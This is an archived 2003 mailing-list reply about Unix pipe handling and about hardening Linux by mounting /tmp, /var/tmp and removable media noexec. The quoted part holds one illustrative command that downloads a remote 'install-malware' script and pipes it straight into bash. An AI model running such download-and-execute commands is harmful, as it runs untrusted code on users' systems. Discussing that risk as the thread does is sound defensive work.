On Thu, 6 Feb 2003, Tzafrir Cohen wrote: > > lynx -dump http://www.microsoft.com/install-malware | bash > > This creates a temporary file in /tmp (or whatever) and executes it, to > the best of my knowledge. But I believe that such a limitation will break > many other programs
Dos handles "pipes" that way, but *x does an in-memory transfer using file semantics. Some programs, notably less, (probably) do use temproary files; less needs to seek, and you can't seek on pipes. Mounting /tmp and /var/tmp noexec may well break some things; you would need to test it with your workload. I know rpm uses /var/tmp for scripts it runs. However, the idea of mounting noexec is to break some things. Oh, mount cds and floppies noexec by default too. -- Cheers John. Join the "Linux Support by Small Businesses" list at http://mail.computerdatasafe.com.au/mailman/listinfo/lssb
